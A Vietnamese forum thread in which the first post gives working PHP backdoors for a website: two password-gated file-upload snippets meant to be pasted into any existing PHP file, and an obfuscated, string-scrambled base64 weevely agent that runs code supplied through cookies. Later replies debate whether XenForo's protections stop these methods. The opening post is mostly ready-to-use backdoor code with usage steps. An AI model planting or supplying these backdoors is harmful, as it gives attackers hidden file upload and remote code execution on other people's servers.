Cách 1: Tìm 1 file php bất kỳ, file nào cũng được chèn vào dưới <?php đoạn code sau Mã: if(@$_REQUEST["sanvu88"]== 'sanvu88'){ $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');} Hoặc Mã: if($_GET['sanvu88']=='sanvu88') { echo '<form method="POST" enctype="multipart/form-data" action="?sanvu88=sanvu88"> <input type="file" name="file_upload" size="20" id="file"> <input type="submit" name="gui" value="Up" > </form>';if (isset($_POST['gui'])){ move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']); } } Cách run ví dụ ta chèn vào file index.php thì run như sau http://domain.com/index.php?sanvu88=sanvu88 Kết quả ta được 1 form upload và làm gì với nó là tùy các bạn thôi 2. Backdoors Tạo 1 file php. Ví dụ mình tạo file func.php trong thư mục library với nội dung Mã: <?php $vdn = str_replace("tw","","stwttwr_twretwpltwactwe"); $hh="mksIGumpvaumW4umoYXJyYXlumfc2xpumY2UoJumGEsJGMoJGEpLTMpKSumkpumKTtlY2hvICc8LycuJGsuJz4nO3um0="; $rft="0X2RlY29kZSumhwcmVnXum3JlcGxhY2UoYumXJyYXkoumJy9bXlumx3PVxzXS8nLCcvXHMvJyksumIGFycmF5KCcnLCcrJyu"; $aec="JGM9J2NvdumW50JzskYTum0kX0NPT0umtJRTtpZiumhyZXNldCgkYSumk9PSumc2NScgJiYgJumGMoJumGEpPjMpe2luaV9zumZ"; $wmh="umXQoJ2Vycm9yX2xvZycsICcvZGV2L25um1bGwnKTumskaz0numNDumMyMumSc7ZumWNobyAnPCcuJGsuJz4nO2V2YWwoYmFzZTY"; $pre = $vdn("ov", "", "ovbaovsoveov64_doveovcovoovdove"); $hkc = $vdn("an","","ancanraneatane_fuanncantioann"); $hc = $hkc('', $pre($vdn("um", "", $aec.$wmh.$rft.$hh))); $hc(); ?> Cách run. Cái này phải dụng backtrack để kết nối Tool weevely của backtrack Các bạn cũng có thể dùng backtrack để tạo code backdoor cho riêng mình nhé code ở trên chỉ là ví dụ và đã đặt pass mình chỉ đưa ra làm ví dụ thôi Với backdoor dạng này thì có thể kết nối tới server và run các lệnh local bình thường nếu server cho phép. Done. Chúc vui.
Tất cả các cách mà bạn đề cập XenForo đã chặn hết rồi @sanvu88 nhé. Do đó việc include backdoor vào XenForo rất khó có thể thực hiện được.
Bạn nói: Trong thư mục library có htaccess chặn ko cho phép bất kỳ truy cập nào từ bên ngoài vào các file php ở library bạn nhé => cách của bạn ko chạy được đâu.
Mình đọc title tưởng upload backdoor hoặc upload shell lên sv đang chạy, chứ chèn vào source có sẵn thì không khó đâu Alucar
Đâu nhất thiêt chèn trong thư mục library đâu @@ hơn nữa đâu phải ai cũng xài apache để cái htaccess đó có tác dụng ==" trường hợp dùng nginx thì htaccess đâu có tác dụng gì
@sanvu88 vì trong hướng dẫn bạn để là chèn vào library nên mình trả lời vậy Kể cả khi bạn sài nginx hay bất kỳ webserver cũng ko được nhé. Ở đây mình ko muốn public cách chèn shell vì lợi ít hại nhiều. Còn vẫn có cách chèn shell vào XenForo bạn nhé.
đã nói là ví dụ thôi mà còn những cái pub ra thì tất nhiên là chả ai dại gì mà pub hết vốn liếng của mình cả
câu hỏi đơn giản là : tại sao bạn thêm code vào file trên host đc , mà host đó không fai của bạn làm đc điều đó đi thì hãy run shell
Chưa thấy bạn nào thử thành công trên server bên mình theo 2 cách bạn chủ bài viết nêu ra cả.
chủ đề nay rất hay, các pro bình luận càng "chân thành" thì các newbie như mình học hỏi càng nhiều về bảo mật và quan trị xenforo. Mong có nhiều chủ đề như thế này
